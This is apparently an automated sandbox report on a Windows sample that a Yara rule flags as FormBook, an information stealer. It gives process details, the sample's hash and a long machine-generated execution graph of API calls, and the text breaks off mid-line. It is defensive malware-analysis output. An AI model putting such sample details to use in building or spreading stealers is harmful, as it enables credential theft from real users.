                                                                              Has exited:false

                                                                              Target ID:17
                                                                              Start time:02:32:30
                                                                              Start date:09/12/2024
                                                                              Path:C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe"
                                                                              Imagebase:0x210000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:19
                                                                              Start time:02:32:45
                                                                              Start date:09/12/2024
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x140000000
                                                                              File size:1'246'208 bytes
                                                                              MD5 hash:30AE870CC81481FC14F2B11D911AB42F
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3.5%
                                                                                Dynamic/Decrypted Code Coverage:8.1%
                                                                                Signature Coverage:7.4%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:77
                                                                                execution_graph 109592 43fe27 109605 41f944 109592->109605 109594 43fe3d 109595 43fe53 109594->109595 109596 43febe 109594->109596 109694 409e5d 60 API calls 109595->109694 109614 40fce0 109596->109614 109598 43fe92 109599 44089c 109598->109599 109602 43fe9a 109598->109602 109696 469e4a 89 API calls 4 library calls 109599->109696 109695 46834f 59 API calls Mailbox 109602->109695 109604 43feb2 Mailbox 109606 41f950 109605->109606 109607 41f962 109605->109607 109697 409d3c 109606->109697 109609 41f991 109607->109609 109610 41f968 109607->109610 109612 409d3c 60 API calls 109609->109612 109710 420db6 109610->109710 109613 41f95a 109612->109613 109613->109594 109755 408180 109614->109755 109616 40fd3d 109617 44472d 109616->109617 109670 4106f6 109616->109670 109760 40f234 109616->109760 109891 469e4a 89 API calls 4 library calls 109617->109891 109621 444742 109622 44488d 109622->109621 109626 40fe4c 109622->109626 109897 47a2d9 85 API calls Mailbox 109622->109897 109623 444b53 109623->109621 109916 469e4a 89 API calls 4 library calls 109623->109916 109624 40fe3e 109624->109622 109624->109626 109895 4566ec 59 API calls 2 library calls 109624->109895 109625 410517 109633 420db6 Mailbox 59 API calls 109625->109633 109626->109623 109635 4448f9 109626->109635 109764 40837c 109626->109764 109627 4447d7 109627->109621 109893 469e4a 89 API calls 4 library calls 109627->109893 109630 420db6 59 API calls Mailbox 109656 40fdd3 109630->109656 109641 410545 _memmove 109633->109641 109634 444848 109896 4560ef 59 API calls 2 library calls 109634->109896 109642 444917 109635->109642 109899 4085c0 109635->109899 109639 444755 109639->109627 109892 40f6a3 331 API calls 109639->109892 109652 420db6 Mailbox 59 API calls 109641->109652 109648 444928 109642->109648 109649 4085c0 59 API calls 109642->109649 109643 40fea4 109650 444ad6 109643->109650 109651 40ff32 109643->109651 109672 410179 Mailbox _memmove 109643->109672 109644 44486b 109646 409ea0 331 API calls 109644->109646 109645 4448b2 Mailbox 109645->109626 109898 4566ec 59 API calls 2 library calls 109645->109898 109646->109622 109648->109672 109907 4560ab 59 API calls Mailbox 109648->109907 109649->109648 109915 469ae7 60 API calls 109650->109915 109654 420db6 Mailbox 59 API calls 109651->109654 109658 410106 _memmove 109652->109658 109659 40ff39 109654->109659 109656->109621 109656->109624 109656->109625 109656->109630 109656->109639 109656->109641 109668 44480c 109656->109668 109861 409ea0 109656->109861 109658->109672 109693 410162 109658->109693 109885 409c90 109658->109885 109659->109670 109771 4109d0 109659->109771 109661 409ea0 331 API calls 109663 444a87 109661->109663 109663->109621 109910 4084c0 109663->109910 109665 40ffb2 109665->109641 109665->109670 109674 40ffe6 109665->109674 109894 469e4a 89 API calls 4 library calls 109668->109894 109890 469e4a 89 API calls 4 library calls 109670->109890 109672->109670 109673 444ab2 109672->109673 109677 409d3c 60 API calls 109672->109677 109680 410398 109672->109680 109681 420db6 59 API calls Mailbox 109672->109681 109687 444a1c 109672->109687 109692 444a4d 109672->109692 109859 408740 68 API calls __cinit 109672->109859 109860 408660 68 API calls 109672->109860 109908 465937 68 API calls 109672->109908 109909 4089b3 69 API calls Mailbox 109672->109909 109914 469e4a 89 API calls 4 library calls 109673->109914 109678 408047 59 API calls 109674->109678 109679 410007 109674->109679 109677->109672 109678->109679 109679->109670 109682 444b24 109679->109682 109684 41004c 109679->109684 109680->109604 109681->109672 109683 409d3c 60 API calls 109682->109683 109683->109623 109684->109623 109684->109670 109685 4100d8 109684->109685 109686 409d3c 60 API calls 109685->109686 109688 4100eb 109686->109688 109690 420db6 Mailbox 59 API calls 109687->109690 109688->109670 109848 4082df 109688->109848 109690->109692 109692->109661 109693->109604 109694->109598 109695->109604 109696->109604 109698 409d4a 109697->109698 109708 409d78 Mailbox 109697->109708 109699 409d9d 109698->109699 109703 409d50 Mailbox 109698->109703 109720 408047 109699->109720 109701 409d64 109704 409dcc 109701->109704 109705 409d6f 109701->109705 109701->109708 109702 43fa0f 109702->109708 109725 456e8f 59 API calls 109702->109725 109703->109701 109703->109702 109704->109708 109724 408cd4 59 API calls Mailbox 109704->109724 109706 43f9e6 VariantClear 109705->109706 109705->109708 109706->109708 109708->109613 109713 420dbe 109710->109713 109712 420dd8 109712->109613 109713->109712 109715 420ddc std::exception::exception 109713->109715 109727 42571c 109713->109727 109744 4233a1 DecodePointer 109713->109744 109745 42859b RaiseException 109715->109745 109717 420e06 109746 4284d1 58 API calls _free 109717->109746 109719 420e18 109719->109613 109721 408052 109720->109721 109722 40805a 109720->109722 109726 407f77 59 API calls 2 library calls 109721->109726 109722->109708 109724->109708 109725->109708 109726->109722 109728 425797 109727->109728 109732 425728 109727->109732 109753 4233a1 DecodePointer 109728->109753 109730 42579d 109754 428b28 58 API calls __getptd_noexit 109730->109754 109731 425733 109731->109732 109747 42a16b 58 API calls __NMSG_WRITE 109731->109747 109748 42a1c8 58 API calls 7 library calls 109731->109748 109749 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109731->109749 109732->109731 109735 42575b RtlAllocateHeap 109732->109735 109738 425783 109732->109738 109742 425781 109732->109742 109750 4233a1 DecodePointer 109732->109750 109735->109732 109736 42578f 109735->109736 109736->109713 109751 428b28 58 API calls __getptd_noexit 109738->109751 109752 428b28 58 API calls __getptd_noexit 109742->109752 109744->109713 109745->109717 109746->109719 109747->109731 109748->109731 109750->109732 109751->109742 109752->109736 109753->109730 109754->109736 109756 40818f 109755->109756 109759 4081aa 109755->109759 109917 407e4f 109756->109917 109758 408197 CharUpperBuffW 109758->109759 109759->109616 109761 40f251 109760->109761 109762 40f272 109761->109762 109921 469e4a 89 API calls 4 library calls 109761->109921 109762->109656 109765 40838d 109764->109765 109766 43edbd 109764->109766 109767 420db6 Mailbox 59 API calls 109765->109767 109768 408394 109767->109768 109769 4083b5 109768->109769 109922 408634 59 API calls Mailbox 109768->109922 109769->109635 109769->109643 109772 444cc3 109771->109772 109786 4109f5 109771->109786 109982 469e4a 89 API calls 4 library calls 109772->109982 109774 410cfa 109774->109665 109776 410ee4 109776->109774 109778 410ef1 109776->109778 109980 411093 331 API calls Mailbox 109778->109980 109779 410a4b PeekMessageW 109817 410a05 Mailbox 109779->109817 109781 410ef8 LockWindowUpdate DestroyWindow GetMessageW 109781->109774 109784 410f2a 109781->109784 109783 444e81 Sleep 109783->109817 109787 445c58 TranslateMessage DispatchMessageW GetMessageW 109784->109787 109785 410ce4 109785->109774 109979 411070 10 API calls Mailbox 109785->109979 109786->109817 109983 409e5d 60 API calls 109786->109983 109984 456349 331 API calls 109786->109984 109787->109787 109789 445c88 109787->109789 109789->109774 109790 410e43 PeekMessageW 109790->109817 109791 410ea5 TranslateMessage DispatchMessageW 109791->109790 109792 444d50 TranslateAcceleratorW 109792->109790 109792->109817 109793 409e5d 60 API calls 109793->109817 109794 410d13 timeGetTime 109794->109817 109795 44581f WaitForSingleObject 109797 44583c GetExitCodeProcess CloseHandle 109795->109797 109795->109817 109834 410f95 109797->109834 109798 410e5f Sleep 109828 410e70 Mailbox 109798->109828 109799 408047 59 API calls 109799->109817 109801 445af8 Sleep 109801->109828 109803 420db6 59 API calls Mailbox 109803->109817 109804 40b73c 304 API calls 109804->109817 109806 42049f timeGetTime 109806->109828 109807 410f4e timeGetTime 109981 409e5d 60 API calls 109807->109981 109810 445b8f GetExitCodeProcess 109814 445ba5 WaitForSingleObject 109810->109814 109815 445bbb CloseHandle 109810->109815 109812 485f25 110 API calls 109812->109828 109813 40b7dd 109 API calls 109813->109828 109814->109815 109814->109817 109815->109828 109817->109779 109817->109783 109817->109785 109817->109790 109817->109791 109817->109792 109817->109793 109817->109794 109817->109795 109817->109798 109817->109799 109817->109801 109817->109803 109817->109804 109817->109807 109827 409ea0 304 API calls 109817->109827 109817->109828 109831 40fce0 304 API calls 109817->109831 109817->109834 109835 469e4a 89 API calls 109817->109835 109836 4084c0 69 API calls 109817->109836 109838 409c90 59 API calls Mailbox 109817->109838 109839 45617e 59 API calls Mailbox 109817->109839 109840 4082df 59 API calls 109817->109840 109841 407de1 59 API calls 109817->109841 109842 4089b3 69 API calls 109817->109842 109843 4455d5 VariantClear 109817->109843 109844 44566b VariantClear 109817->109844 109845 445419 VariantClear 109817->109845 109846 456e8f 59 API calls 109817->109846 109847 408cd4 59 API calls Mailbox 109817->109847 109923 40e6a0 109817->109923 109954 40f460 109817->109954 109973 4031ce 109817->109973 109978 40e420 331 API calls 109817->109978 109985 486018 59 API calls 109817->109985 109986 469a15 59 API calls Mailbox 109817->109986 109987 45d4f2 59 API calls 109817->109987 109988 409837 109817->109988 110006 4560ef 59 API calls 2 library calls 109817->110006 110007 408401 59 API calls 109817->110007 109819 445874 109819->109834 109820 445078 Sleep 109820->109817 109821 445c17 Sleep 109821->109817 109827->109817 109828->109806 109828->109810 109828->109812 109828->109813 109828->109817 109828->109819 109828->109820 109828->109821 109828->109834 110008 407667 109828->110008 110013 462408 60 API calls 109828->110013 110014 409e5d 60 API calls 109828->110014 110015 407de1 109828->110015 110019 4089b3 69 API calls Mailbox 109828->110019 110020 40b73c 331 API calls 109828->110020 110021 4564da 60 API calls 109828->110021 110022 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109828->110022 110023 463c55 66 API calls Mailbox 109828->110023 109831->109817 109834->109665 109835->109817 109836->109817 109838->109817 109839->109817 109840->109817 109841->109817 109842->109817 109843->109817 109844->109817 109845->109817 109846->109817 109847->109817 109849 43eda1 109848->109849 109852 4082f2 109848->109852 109850 43edb1 109849->109850 111145 4561a4 59 API calls 109849->111145 109853 40831c 109852->109853 109854 4085c0 59 API calls 109852->109854 109858 408339 Mailbox 109852->109858 109855 408322 109853->109855 109856 4085c0 59 API calls 109853->109856 109854->109853 109857 409c90 Mailbox 59 API calls 109855->109857 109855->109858 109856->109855 109857->109858 109858->109658 109859->109672 109860->109672 109862 409ebf 109861->109862 109870 409eed Mailbox 109861->109870 109863 420db6 Mailbox 59 API calls 109862->109863 109863->109870 109864 40b47a 109867 4409e5 109864->109867 109868 440055 109864->109868 109865 40b475 109866 408047 59 API calls 109865->109866 109872 40a057 109866->109872 111151 469e4a 89 API calls 4 library calls 109867->111151 111148 469e4a 89 API calls 4 library calls 109868->111148 109869 407667 59 API calls 109869->109870 109870->109864 109870->109865 109870->109868 109870->109869 109870->109872 109875 420db6 59 API calls Mailbox 109870->109875 109878 408047 59 API calls 109870->109878 109880 456e8f 59 API calls 109870->109880 109881 422d40 67 API calls __cinit 109870->109881 109882 4409d6 109870->109882 109884 40a55a 109870->109884 111146 40c8c0 331 API calls 2 library calls 109870->111146 111147 40b900 60 API calls Mailbox 109870->111147 109872->109656 109875->109870 109876 440064 109876->109656 109878->109870 109880->109870 109881->109870 111150 469e4a 89 API calls 4 library calls 109882->111150 111149 469e4a 89 API calls 4 library calls 109884->111149 109887 409c9b 109885->109887 109886 409cd2 109886->109658 109887->109886 111152 408cd4 59 API calls Mailbox 109887->111152 109889 409cfd 109889->109658 109890->109617 109891->109621 109892->109627 109893->109621 109894->109621 109895->109634 109896->109644 109897->109645 109898->109645 109900 4085ce 109899->109900 109906 4085f6 109899->109906 109901 4085dc 109900->109901 109902 4085c0 59 API calls 109900->109902 109903 4085e2 109901->109903 109904 4085c0 59 API calls 109901->109904 109902->109901 109905 409c90 Mailbox 59 API calls 109903->109905 109903->109906 109904->109903 109905->109906 109906->109642 109907->109672 109908->109672 109909->109672 109911 4084cb 109910->109911 109913 4084f2 109911->109913 111153 4089b3 69 API calls Mailbox 109911->111153 109913->109673 109914->109621 109915->109674 109916->109621 109918 407e62 109917->109918 109920 407e5f _memmove 109917->109920 109919 420db6 Mailbox 59 API calls 109918->109919 109919->109920 109920->109758 109921->109762 109922->109769 109924 40e6d5 109923->109924 109925 443aa9 109924->109925 109927 40e799 109924->109927 109929 40e73f 109924->109929 109926 409ea0 331 API calls 109925->109926 109928 443abe 109926->109928 109930 407667 59 API calls 109927->109930 109934 422d40 __cinit 67 API calls 109927->109934 109935 443b26 109927->109935 109938 40e95a 109927->109938 109953 40e970 Mailbox 109927->109953 109928->109953 110025 469e4a 89 API calls 4 library calls 109928->110025 109929->109927 109932 407667 59 API calls 109929->109932 109930->109927 109933 443b04 109932->109933 110026 422d40 109933->110026 109934->109927 109935->109817 109937 4084c0 69 API calls 109937->109953 109938->109953 110029 469e4a 89 API calls 4 library calls 109938->110029 109940 409ea0 331 API calls 109940->109953 109941 408d40 59 API calls 109941->109953 109942 409c90 Mailbox 59 API calls 109942->109953 109948 469e4a 89 API calls 109948->109953 109949 40f195 110033 469e4a 89 API calls 4 library calls 109949->110033 109951 443e25 109951->109817 109952 40ea78 109952->109817 109953->109937 109953->109940 109953->109941 109953->109942 109953->109948 109953->109949 109953->109952 110024 407f77 59 API calls 2 library calls 109953->110024 110030 456e8f 59 API calls 109953->110030 110031 47c5c3 331 API calls 109953->110031 110032 47b53c 331 API calls Mailbox 109953->110032 110034 4793c6 331 API calls Mailbox 109953->110034 109955 40f650 109954->109955 109956 40f4ba 109954->109956 109959 407de1 59 API calls 109955->109959 109957 40f4c6 109956->109957 109958 44441e 109956->109958 110211 40f290 331 API calls 2 library calls 109957->110211 110212 47bc6b 109958->110212 109966 40f58c Mailbox 109959->109966 109962 40f630 109962->109817 109963 44442c 109963->109962 110252 469e4a 89 API calls 4 library calls 109963->110252 109965 40f4fd 109965->109962 109965->109963 109965->109966 110113 463c37 109966->110113 110116 46cb7a 109966->110116 110196 47445a 109966->110196 110205 404e4a 109966->110205 109967 409c90 Mailbox 59 API calls 109968 40f5e3 109967->109968 109968->109962 109968->109967 109974 403212 109973->109974 109976 4031e0 109973->109976 109974->109817 109975 403205 IsDialogMessageW 109975->109974 109975->109976 109976->109974 109976->109975 109977 43cf32 GetClassLongW 109976->109977 109977->109975 109977->109976 109978->109817 109979->109776 109980->109781 109981->109817 109982->109786 109983->109786 109984->109786 109985->109817 109986->109817 109987->109817 109989 409851 109988->109989 109990 40984b 109988->109990 109991 43f5d3 __i64tow 109989->109991 109992 409899 109989->109992 109993 409857 __itow 109989->109993 109998 43f4da 109989->109998 109990->109817 111143 423698 83 API calls 2 library calls 109992->111143 109995 420db6 Mailbox 59 API calls 109993->109995 109997 409871 109995->109997 109997->109990 110001 407de1 59 API calls 109997->110001 109999 43f552 Mailbox _wcscpy 109998->109999 110000 420db6 Mailbox 59 API calls 109998->110000 111144 423698 83 API calls 2 library calls 109999->111144 110002 43f51f 110000->110002 110001->109990 110003 420db6 Mailbox 59 API calls 110002->110003 110004 43f545 110003->110004 110004->109999 110005 407de1 59 API calls 110004->110005 110005->109999 110006->109817 110007->109817 110009 420db6 Mailbox 59 API calls 110008->110009 110010 407688 110009->110010 110011 420db6 Mailbox 59 API calls 110010->110011 110012 407696 110011->110012 110012->109828 110013->109828 110014->109828 110016 407df0 __wsetenvp _memmove 110015->110016 110017 420db6 Mailbox 59 API calls 110016->110017 110018 407e2e 110017->110018 110018->109828 110019->109828 110020->109828 110021->109828 110022->109828 110023->109828 110024->109953 110025->109953 110035 422c44 110026->110035 110028 422d4b 110028->109927 110029->109953 110030->109953 110031->109953 110032->109953 110033->109951 110034->109953 110036 422c50 __getstream 110035->110036 110043 423217 110036->110043 110042 422c77 __getstream 110042->110028 110060 429c0b 110043->110060 110045 422c59 110046 422c88 DecodePointer DecodePointer 110045->110046 110047 422c65 110046->110047 110048 422cb5 110046->110048 110057 422c82 110047->110057 110048->110047 110106 4287a4 59 API calls __woutput_l 110048->110106 110050 422d18 EncodePointer EncodePointer 110050->110047 110051 422cec 110051->110047 110055 422d06 EncodePointer 110051->110055 110108 428864 61 API calls 2 library calls 110051->110108 110052 422cc7 110052->110050 110052->110051 110107 428864 61 API calls 2 library calls 110052->110107 110055->110050 110056 422d00 110056->110047 110056->110055 110109 423220 110057->110109 110061 429c2f EnterCriticalSection 110060->110061 110062 429c1c 110060->110062 110061->110045 110067 429c93 110062->110067 110064 429c22 110064->110061 110091 4230b5 58 API calls 3 library calls 110064->110091 110068 429c9f __getstream 110067->110068 110069 429cc0 110068->110069 110070 429ca8 110068->110070 110083 429ce1 __getstream 110069->110083 110095 42881d 58 API calls 2 library calls 110069->110095 110092 42a16b 58 API calls __NMSG_WRITE 110070->110092 110072 429cad 110093 42a1c8 58 API calls 7 library calls 110072->110093 110075 429cd5 110077 429ceb 110075->110077 110078 429cdc 110075->110078 110076 429cb4 110094 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 110076->110094 110081 429c0b __lock 58 API calls 110077->110081 110096 428b28 58 API calls __getptd_noexit 110078->110096 110084 429cf2 110081->110084 110083->110064 110085 429d17 110084->110085 110086 429cff 110084->110086 110098 422d55 110085->110098 110097 429e2b InitializeCriticalSectionAndSpinCount 110086->110097 110089 429d0b 110104 429d33 LeaveCriticalSection _doexit 110089->110104 110092->110072 110093->110076 110095->110075 110096->110083 110097->110089 110099 422d5e RtlFreeHeap 110098->110099 110103 422d87 __dosmaperr 110098->110103 110100 422d73 110099->110100 110099->110103 110105 428b28 58 API calls __getptd_noexit 110100->110105 110102 422d79 GetLastError 110102->110103 110103->110089 110104->110083 110105->110102 110106->110052 110107->110051 110108->110056 110112 429d75 LeaveCriticalSection 110109->110112 110111 422c87 110111->110042 110112->110111 110253 46445a GetFileAttributesW 110113->110253 110117 407667 59 API calls 110116->110117 110118 46cbaf 110117->110118 110119 407667 59 API calls 110118->110119 110120 46cbb8 110119->110120 110121 46cbcc 110120->110121 110453 409b3c 110120->110453 110123 409837 84 API calls 110121->110123 110124 46cbe9 110123->110124 110125 46ccea 110124->110125 110126 46cc0b 110124->110126 110129 46cd1a Mailbox 110124->110129 110257 404ddd 110125->110257 110127 409837 84 API calls 110126->110127 110130 46cc17 110127->110130 110129->109968 110132 408047 59 API calls 110130->110132 110135 46cc23 110132->110135 110133 46cd16 110133->110129 110134 407667 59 API calls 110133->110134 110137 46cd4b 110134->110137 110140 46cc37 110135->110140 110141 46cc69 110135->110141 110136 404ddd 136 API calls 110136->110133 110138 407667 59 API calls 110137->110138 110139 46cd54 110138->110139 110143 407667 59 API calls 110139->110143 110144 408047 59 API calls 110140->110144 110142 409837 84 API calls 110141->110142 110145 46cc76 110142->110145 110146 46cd5d 110143->110146 110147 46cc47 110144->110147 110148 408047 59 API calls 110145->110148 110149 407667 59 API calls 110146->110149 110457 407cab 110147->110457 110151 46cc82 110148->110151 110152 46cd66 110149->110152 110464 464a31 GetFileAttributesW 110151->110464 110155 409837 84 API calls 110152->110155 110159 46cd73 110155->110159 110156 409837 84 API calls 110157 46cc5d 110156->110157 110160 407b2e 59 API calls 110157->110160 110158 46cc8b 110161 46cc9e 110158->110161 110164 4079f2 59 API calls 110158->110164 110281 40459b 110159->110281 110160->110141 110163 409837 84 API calls 110161->110163 110170 46cca4 110161->110170 110166 46cccb 110163->110166 110164->110161 110165 46cd8e 110332 4079f2 110165->110332 110465 4637ef 75 API calls Mailbox 110166->110465 110170->110129 110171 46cdd1 110173 408047 59 API calls 110171->110173 110172 4079f2 59 API calls 110174 46cdae 110172->110174 110175 46cddf 110173->110175 110174->110171 110466 407bcc 110174->110466 110335 407b2e 110175->110335 110179 46cdc3 110181 407bcc 59 API calls 110179->110181 110180 407b2e 59 API calls 110182 46cdfb 110180->110182 110181->110171 110183 407b2e 59 API calls 110182->110183 110184 46ce09 110183->110184 110185 409837 84 API calls 110184->110185 110186 46ce15 110185->110186 110344 464071 110186->110344 110188 46ce26 110189 463c37 3 API calls 110188->110189 110190 46ce30 110189->110190 110191 409837 84 API calls 110190->110191 110195 46ce61 110190->110195 110192 46ce4e 110191->110192 110398 469155 110192->110398 110194 404e4a 84 API calls 110194->110129 110195->110194 110197 409837 84 API calls 110196->110197 110198 474494 110197->110198 111090 406240 110198->111090 110200 4744a4 110201 4744c9 110200->110201 110202 409ea0 331 API calls 110200->110202 110204 4744cd 110201->110204 111115 409a98 59 API calls Mailbox 110201->111115 110202->110201 110204->109968 110206 404e54 110205->110206 110208 404e5b 110205->110208 110207 4253a6 __fcloseall 83 API calls 110206->110207 110207->110208 110209 404e6a 110208->110209 110210 404e7b FreeLibrary 110208->110210 110209->109968 110210->110209 110211->109965 110213 47bc96 110212->110213 110214 47bcb0 110212->110214 111135 469e4a 89 API calls 4 library calls 110213->111135 111136 47a213 59 API calls Mailbox 110214->111136 110217 47bcbb 110218 409ea0 330 API calls 110217->110218 110219 47bd1c 110218->110219 110220 47bca8 Mailbox 110219->110220 110221 47bdae 110219->110221 110225 47bd5d 110219->110225 110220->109963 110222 47be04 110221->110222 110223 47bdb4 110221->110223 110222->110220 110224 409837 84 API calls 110222->110224 111138 46791a 59 API calls 110223->111138 110226 47be16 110224->110226 111137 4672df 59 API calls Mailbox 110225->111137 110228 407e4f 59 API calls 110226->110228 110231 47be3a CharUpperBuffW 110228->110231 110229 47bdd7 111139 405d41 59 API calls Mailbox 110229->111139 110236 47be54 110231->110236 110233 47bd8d 110235 40f460 330 API calls 110233->110235 110234 47bddf Mailbox 110240 40fce0 330 API calls 110234->110240 110235->110220 110237 47bea7 110236->110237 110238 47be5b 110236->110238 110239 409837 84 API calls 110237->110239 111140 4672df 59 API calls Mailbox 110238->111140 110241 47beaf 110239->110241 110240->110220 111141 409e5d 60 API calls 110241->111141 110244 47be89 110245 40f460 330 API calls 110244->110245 110245->110220 110246 47beb9 110246->110220 110247 409837 84 API calls 110246->110247 110248 47bed4 110247->110248 111142 405d41 59 API calls Mailbox 110248->111142 110250 47bee4 110251 40fce0 330 API calls 110250->110251 110251->110220 110252->109962 110254 463c3e 110253->110254 110255 464475 FindFirstFileW 110253->110255 110254->109968 110255->110254 110256 46448a FindClose 110255->110256 110256->110254 110475 404bb5 110257->110475 110262 43d8e6 110265 404e4a 84 API calls 110262->110265 110263 404e08 LoadLibraryExW 110485 404b6a 110263->110485 110267 43d8ed 110265->110267 110268 404b6a 3 API calls 110267->110268 110270 43d8f5 110268->110270 110511 404f0b 110270->110511 110271 404e2f 110271->110270 110272 404e3b 110271->110272 110274 404e4a 84 API calls 110272->110274 110276 404e40 110274->110276 110276->110133 110276->110136 110278 43d91c 110519 404ec7 110278->110519 110282 407667 59 API calls 110281->110282 110283 4045b1 110282->110283 110284 407667 59 API calls 110283->110284 110285 4045b9 110284->110285 110286 407667 59 API calls 110285->110286 110287 4045c1 110286->110287 110288 407667 59 API calls 110287->110288 110289 4045c9 110288->110289 110290 43d4d2 110289->110290 110291 4045fd 110289->110291 110292 408047 59 API calls 110290->110292 110293 40784b 59 API calls 110291->110293 110294 43d4db 110292->110294 110295 40460b 110293->110295 110711 407d8c 110294->110711 110707 407d2c 110295->110707 110298 404615 110299 404640 110298->110299 110300 40784b 59 API calls 110298->110300 110302 43d4fb 110299->110302 110303 40465f 110299->110303 110318 404680 110299->110318 110304 404636 110300->110304 110307 43d5cb 110302->110307 110316 43d5b4 110302->110316 110325 43d532 110302->110325 110305 4079f2 59 API calls 110303->110305 110308 407d2c 59 API calls 110304->110308 110310 404669 110305->110310 110306 404691 110311 408047 59 API calls 110306->110311 110313 4046a3 110306->110313 110309 407bcc 59 API calls 110307->110309 110308->110299 110327 43d588 110309->110327 110314 40784b 59 API calls 110310->110314 110310->110318 110311->110313 110312 4046b3 110317 4046ba 110312->110317 110319 408047 59 API calls 110312->110319 110313->110312 110315 408047 59 API calls 110313->110315 110314->110318 110315->110312 110316->110307 110322 43d59f 110316->110322 110320 408047 59 API calls 110317->110320 110329 4046c1 Mailbox 110317->110329 110694 40784b 110318->110694 110319->110317 110320->110329 110321 43d590 110323 407bcc 59 API calls 110321->110323 110324 407bcc 59 API calls 110322->110324 110323->110327 110324->110327 110325->110321 110330 43d57b 110325->110330 110326 4079f2 59 API calls 110326->110327 110327->110318 110327->110326 110715 407924 59 API calls 2 library calls 110327->110715 110329->110165 110331 407bcc 59 API calls 110330->110331 110331->110327 110333 407e4f 59 API calls 110332->110333 110334 4079fd 110333->110334 110334->110171 110334->110172 110336 407b40 110335->110336 110337 43ec6b 110335->110337 110723 407a51 110336->110723 110729 457bdb 59 API calls _memmove 110337->110729 110340 407b4c 110340->110180 110341 43ec75 110342 408047 59 API calls 110341->110342 110343 43ec7d Mailbox 110342->110343 110345 46408d 110344->110345 110346 464092 110345->110346 110347 4640a0 110345->110347 110348 408047 59 API calls 110346->110348 110349 407667 59 API calls 110347->110349 110350 46409b Mailbox 110348->110350 110351 4640a8 110349->110351 110350->110188 110352 407667 59 API calls 110351->110352 110353 4640b0 110352->110353 110354 407667 59 API calls 110353->110354 110355 4640bb 110354->110355 110356 407667 59 API calls 110355->110356 110357 4640c3 110356->110357 110358 407667 59 API calls 110357->110358 110359 4640cb 110358->110359 110360 407667 59 API calls 110359->110360 110361 4640d3 110360->110361 110362 407667 59 API calls 110361->110362 110363 4640db 110362->110363 110364 407667 59 API calls 110363->110364 110365 4640e3 110364->110365 110366 40459b 59 API calls 110365->110366 110367 4640fa 110366->110367 110368 40459b 59 API calls 110367->110368 110369 464113 110368->110369 110370 4079f2 59 API calls 110369->110370 110371 46411f 110370->110371 110372 464132 110371->110372 110373 407d2c 59 API calls 110371->110373 110374 4079f2 59 API calls 110372->110374 110373->110372 110375 46413b 110374->110375 110376 46414b 110375->110376 110377 407d2c 59 API calls 110375->110377 110378 408047 59 API calls 110376->110378 110377->110376 110379 464157 110378->110379 110380 407b2e 59 API calls 110379->110380 110381 464163 110380->110381 110730 464223 59 API calls 110381->110730 110383 464172 110731 464223 59 API calls 110383->110731 110385 464185 110386 4079f2 59 API calls 110385->110386 110387 46418f 110386->110387 110388 4641a6 110387->110388 110389 464194 110387->110389 110390 4079f2 59 API calls 110388->110390 110391 407cab 59 API calls 110389->110391 110392 4641af 110390->110392 110393 4641a1 110391->110393 110394 4641cd 110392->110394 110395 407cab 59 API calls 110392->110395 110396 407b2e 59 API calls 110393->110396 110397 407b2e 59 API calls 110394->110397 110395->110393 110396->110394 110397->110350 110399 469162 __write_nolock 110398->110399 110400 420db6 Mailbox 59 API calls 110399->110400 110401 4691bf 110400->110401 110402 40522e 59 API calls 110401->110402 110403 4691c9 110402->110403 110404 468f5f GetSystemTimeAsFileTime 110403->110404 110405 4691d4 110404->110405 110406 404ee5 85 API calls 110405->110406 110407 4691e7 _wcscmp 110406->110407 110408 46920b 110407->110408 110409 4692b8 110407->110409 110762 469734 110408->110762 110411 469734 96 API calls 110409->110411 110427 469284 _wcscat 110411->110427 110414 404f0b 74 API calls 110416 4692dd 110414->110416 110415 4692c1 110415->110195 110417 404f0b 74 API calls 110416->110417 110419 4692ed 110417->110419 110418 469239 _wcscat _wcscpy 110769 4240fb 58 API calls __wsplitpath_helper 110418->110769 110420 404f0b 74 API calls 110419->110420 110422 469308 110420->110422 110423 404f0b 74 API calls 110422->110423 110424 469318 110423->110424 110425 404f0b 74 API calls 110424->110425 110426 469333 110425->110426 110428 404f0b 74 API calls 110426->110428 110427->110414 110427->110415 110429 469343 110428->110429 110430 404f0b 74 API calls 110429->110430 110431 469353 110430->110431 110432 404f0b 74 API calls 110431->110432 110433 469363 110432->110433 110732 4698e3 GetTempPathW GetTempFileNameW 110433->110732 110435 46936f 110436 42525b 115 API calls 110435->110436 110447 469380 110436->110447 110437 46943a 110746 4253a6 110437->110746 110440 404f0b 74 API calls 110440->110447 110447->110415 110447->110437 110447->110440 110733 424863 110447->110733 110454 409b4d 110453->110454 110455 409b52 110453->110455 110454->110455 111084 42358a 59 API calls 110454->111084 110455->110121 110458 43ed4a 110457->110458 110459 407cbf 110457->110459 110460 408029 59 API calls 110458->110460 111085 407c50 110459->111085 110463 43ed55 __wsetenvp _memmove 110460->110463 110462 407cca 110462->110156 110464->110158 110465->110170 110467 407c45 110466->110467 110468 407bd8 __wsetenvp 110466->110468 110469 407d2c 59 API calls 110467->110469 110471 407c13 110468->110471 110472 407bee 110468->110472 110470 407bf6 _memmove 110469->110470 110470->110179 110474 408029 59 API calls 110471->110474 110473 